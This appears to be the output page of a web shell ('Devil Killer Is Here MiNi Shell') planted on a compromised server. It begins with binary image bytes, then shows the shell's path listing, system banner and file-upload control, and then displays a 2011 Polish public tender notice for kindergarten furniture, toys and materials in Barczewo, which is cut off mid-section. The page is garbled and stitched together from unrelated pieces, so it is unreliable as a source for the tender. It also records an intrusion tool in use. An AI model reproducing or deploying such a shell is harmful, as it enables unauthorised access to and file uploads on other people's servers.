JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111114/296231-N-2011.html

<p class="kh_header"><b>Barczewo: Postępowanie o udzielenie zamówienia publicznego na dostawę:Wyposażenia, zabawek przedszkolnych i materiałów do zajęć do przedszkola</b><br>
<b>Numer ogłoszenia: 296231 - 2011; data zamieszczenia: 14.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkolno-Przedszkolny w Łęgajnach , Łęgajny, ul. Ogrodowa 7, 11-010 Barczewo, woj. warmińsko-mazurskie, tel. 89 514 42 42, faks 89 514 47 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zsplegajny.pl/</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego na dostawę:Wyposażenia, zabawek przedszkolnych i materiałów do zajęć do przedszkola.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wyposażenia, zabawek przedszkolnych i materiałów do zajęć do przedszkola. W zakresie wyposażenia mieszczą się: meble do sali przedszkolnej (w tym szafki, pufy, siedziska, stolik plastyczny, ławeczki, krzesełka). W zakresie zabawek przedszkolnych mieszczą się: zabawki (w tym: puzzle, układanki, lalki, maskotki, pacynki, akcesoria kuchenne do zabawy, plansze edukacyjne, zestawy jedzenia, koszyk na zakupy, zestaw do sprzątania, supermarket/sklepik, teatrzyk, bączek, betoniarka, statki, samochody, garaż, parking). W zakresie materiałów do zajęć mieszczą się: artykuły plastyczne (w tym: farby, bloki, kredki, plastelina, bibuły, tektury, dziurkacze, nożyczki, szablony, kleje, tempery, brystole, filce, folie, pędzle, ołówki, markery wodne, kredki żelowe, flamastry, zeszyty z wycinankami, kolorowy papier, zeszyty z malowankami, zeszyty z origami, gumki do ścierania, pojemniki na farby, piasek pastelowy, kolorowe brokaty, rafia sztuczna, sizal 
w motku, figurki,) Oprogramowanie edukacyjne (płyty CD/DVD z bajkami dla dzieci).Szczegółowy opis i zestawienie przedmiotu zamówienia zawarty jest w załączniku Nr 2 do SIWZ.Warunki dostaw: 
Oferowane przez Wykonawcę przedmioty zamówienia muszą w pełni odpowiadać określonym przez prawo polskie przepisom i normom w zakresie bezpieczeństwa ich użytkowania, w szczególności użytkowania ich przez dzieci, oraz muszą być dopuszczone do sprzedaży na terenie Rzeczypospolitej Polskiej. 
Wszystkie elementy przedmiotu dostawy muszą posiadać certyfikaty i atesty dopuszczające do użytku w przedszkolu, muszą spełniać wymagania norm UE i muszą posiadać certyfikaty bezpieczeństwa, oraz muszą posiadać znak bezpieczeństwa CE (zabawki) lub równoważne. 
Oferowane przedmioty zamówienia nie mogą być wykonane z materiałów (np. toksycznych - kwestia farb, lakierów, impregnatów, surowców, etc.), które mogłyby stanowić zagrożenie dla zdrowia dzieci w trakcie normalnego ich użytkowania, zgodnie z ich przeznaczeniem. Przedmiot dostawy musi być fabrycznie nowy, wolny od wad i obciążeń prawami osób trzecich a Wykonawca będzie posiadał dokumenty potwierdzające (w języku polskim), że zostały one wprowadzone do obrotu zgodnie z prawem. Na każde żądanie Zamawiającego Wykonawca obowiązany jest okazać w stosunku do wskazanych materiałów wszystkie deklaracje zgodności, atesty, certyfikaty, w tym certyfikatem CE. Wraz ze zgłoszeniem do odbioru Wykonawca przedstawi komplet dokumentów odbiorowych (atesty, certyfikaty). Zakończenie dostawy zostanie potwierdzone protokołem odbioru końcowego podpisanym przez Zamawiającego i Wykonawcę. Wykonawca będzie zobowiązany umową do przyjęcia odpowiedzialności od następstw i za wyniki działalności w zakresie: - Organizacji i wykonania dostawy; - Zabezpieczenia interesów osób trzecich; - Warunków bezpieczeństwa i higieny pracy; 
Zamawiający dopuszcza możliwość składania ofert częściowych na wymienione w niniejszej specyfikacji części zamówienia - każda z części stanowi odrębne zamówienie i obejmuje:
A.CZĘŚĆ NR 1. Dostawa wyposażenia do przedszkola.
Część ta polega na dostawie i montażu mebli do sali przedszkolnej. Meble muszą spełniać normy bezpieczeństwa, posiadać wymagane instrukcje, atesty i certyfikaty oraz deklaracje zgodności dopuszczające do stosowania. Wymagany przez Zamawiającego okres gwarancji na dostarczone meble zgodnie z gwarancją producenta. Wykonawca zapewni bezpłatny serwis w okresie gwarancyjnym. Wykonawca w okresie gwarancyjnym zapewni bezpłatny dojazd serwisanta do Zamawiającego, bezpłatny transport przedmiotu umowy do i z serwisu. Wykonawca zobowiązany jest do naprawy przedmiotu umowy w ciągu 3 dni od daty zgłoszenia przez Zamawiającego. Wykonawca jest zobowiązany na własny koszt usunąć opakowania po dostarczeniu i montażu przedmiotu zamówienia. Wykonawca przed przystąpieniem do realizacji zamówienia jest zobowiązany sprawdzić wymiary na miejscu montażu.  
B.CZĘŚĆ NR 2. Dostawa zabawek przedszkolnych. 
Część ta polega na dostawie zabawek do punktu przedszkolnego. Zabawki muszą  spełniać normy bezpieczeństwa, posiadać wymagane instrukcje, atesty i certyfikaty oraz deklaracje zgodności dopuszczające do stosowania. Wymagany przez Zamawiającego okres gwarancji na dostarczone zabawki zgodnie z gwarancją producenta. Wykonawca zapewni bezpłatny serwis w okresie gwarancyjnym. Wykonawca jest zobowiązany na własny koszt usunąć opakowania po dostarczeniu przedmiotu zamówienia. 
C.CZĘŚĆ NR 3. Dostawa materiałów  do zajęć.
Część ta polega na dostawie materiałów do zajęć do przedszkola. Zabawki muszą  spełniać normy bezpieczeństwa, posiadać wymagane instrukcje, atesty i certyfikaty oraz deklaracje zgodności dopuszczające do stosowania. Wymagany przez Zamawiającego okres gwarancji na dostarczone zabawki zgodnie z gwarancją producenta. Wykonawca zapewni bezpłatny serwis 
w okresie gwarancyjnym. Wykonawca jest zobowiązany na własny koszt usunąć opakowania po dostarczeniu przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8, 37.52.00.00-9, 37.82.10.00-9, 37.82.21.00-7, 78.23.50.00-8, 37.82.30.00-3, 44.81.20.00-5, 24.91.00.00-6, 30.19.73.30-8, 30.19.21.30-1, 30.19.21.00-2, 39.24.12.00-5, 44.61.90.00-2, 39.24.12.00-5, 39.56.20.00-9, 22.81.60.00-3, 22.83.00.00-7, 22.99.34.00-1, 30.19.21.25-3, 36.16.21.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający ustala wysokość wadium na kwotę:
Dla części 1 zamówienia: 200,00 PLN (słownie: dwieście złoty 00/100)
Dla części 2 zamówienia: 500,00 PLN (słownie: pięćset złoty 00/100)
Dla części 3 zamówienia: 300,00 PLN (słownie: trzysta złoty 00/100)
Wadium winno być wniesione przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy:
w pieniądzu, 
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych  
gwarancjach ubezpieczeniowych, 
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275).
Wadium musi obejmować cały okres związania ofertą określony pkt 10.1 SIWZ. Wadium wnoszone  w formie  gwarancji  bankowych,  gwarancji  ubezpieczeniowych  lub  poręczeń  musi  być  złożone  w  oryginale.  Gwarancje  bankowe,  gwarancje  ubezpieczeniowe  lub  poręczenia  winny  posiadać  ważność  od  dnia  składania  i  otwarcia  ofert  oraz  zawierać  zobowiązanie gwaranta lub poręczyciela do bezwarunkowej, na każde żądanie zgłoszone przez Zamawiającego,  wypłaty  Zamawiającemu pełnej kwoty wadium w okolicznościach  określonych w art. 46 ust. 5 ustawy Pzp.
Dowód wniesienia wadium powinien być dołączony do oferty (oryginał gwarancji albo poręczenia,  względnie  kopia  przelewu  poświadczona  za  zgodność  z  oryginałem  przez Wykonawcę).
Wadium w formie pieniężnej należy wnieść na rachunek Miejskiego Zespołu Oświaty i Zdrowia w Barczewie: 27 9343 1028 0000 0749 2000 0030, z dopiskiem: Wadium na przetarg - Zakup wyposażenia, zabawek przedszkolnych i materiałów do zajęć do przedszkola w ramach projektu Przedszkole równych SZANS 
Wadium w pozostałych formach należy wnieść w siedzibie Zamawiającego: sekretariat Zespół Szkolno-Przedszkolny w Łęgajnach, Łęgajny ul. Ogrodowa 7, 11-010 Barczewo
Najpóźniej wadium powinno wpłynąć do Zamawiającego w terminie odpowiadającym terminowi składania ofert. W przypadku wniesienia wadium w pieniądzu do oferty dołączyć należy numer konta, adres na który należy dokonać zwrotu wadium,
Wykonawca, który nie wniesie wadium w wysokości określonej w pkt. 9.2. w formach, o których mowa w pkt 9.3. zostanie wykluczony z postępowania,
Zamawiający zwróci lub zatrzyma wadium zgodnie z przepisami art. 46 pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełniania tego warunku w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona ustalenia czy Wykonawca w wystarczający sposób spełnia warunki udziału w postępowaniu, jeżeli wykaże  że w okresie co najmniej ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres jego działalności  jest krótszy - w tym okresie, realizował co najmniej trzy zamówienia na dostawę mebli i/lub zabawek i/lub materiałów do zajęć 
z przeznaczeniem dla jednostek oświatowych lub przedszkoli spełniających wszelkie normy, atesty i certyfikaty do użytku przedszkolnego, wykonane należycie, o wartości min. 5.000,00 PLN brutto; Wykaz dostaw z podaniem nazwy zadania, inwestora, daty realizacji i wartości zadania stanowi załącznik nr 3 do SIWZ. Zamawiający wymaga aby Wykonawca załączył dokument potwierdzający, że dostawy zostały wykonane zgodnie z wymogami, prawidłowo ukończone (np. referencje, listy polecające lub protokoły odbioru końcowego).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełniania tego warunku w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełniania tego warunku w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada opłaconą polisę lub inny dokument ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 25 000,00 zł brutto, słownie: dwadzieścia pięć tysięcy złotych brutto. Oświadczenie stanowi załącznik nr 6 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zsplegajny.pl/ w zakładce zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkolno-Przedszkolny w Łęgajnach, Łęgajny ul. Ogrodowa 7 
11-010 Barczewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2011 godzina 09:00, miejsce: Zespół Szkolno-Przedszkolny w Łęgajnach, Łęgajny ul. Ogrodowa 7 
11-010 Barczewo - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Program Operacyjny Kapitał Ludzki. Priorytet IX. Rozwój wykształcenia i kompetencji w regionach. Działanie 9.1 - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty. Poddziałanie 9.1.1 - Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa wyposażenia do przedszkola..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część ta polega na dostawie i montażu mebli do sali przedszkolnej. Meble muszą spełniać normy bezpieczeństwa, posiadać wymagane instrukcje, atesty i certyfikaty oraz deklaracje zgodności dopuszczające do stosowania. Wymagany przez Zamawiającego okres gwarancji na dostarczone meble zgodnie z gwarancją producenta. Wykonawca zapewni bezpłatny serwis w okresie gwarancyjnym. Wykonawca w okresie gwarancyjnym zapewni bezpłatny dojazd serwisanta do Zamawiającego, bezpłatny transport przedmiotu umowy do i z serwisu. Wykonawca zobowiązany jest do naprawy przedmiotu umowy w ciągu 3 dni od daty zgłoszenia przez Zamawiającego. Wykonawca jest zobowiązany na własny koszt usunąć opakowania po dostarczeniu i montażu przedmiotu zamówienia. Wykonawca przed przystąpieniem do realizacji zamówienia jest zobowiązany sprawdzić wymiary na miejscu montażu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50.00</li>
<li>2. Termin realizacji - 35.00</li>
<li>3. Gwarancja - 15.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa zabawek przedszkolnych..</p>
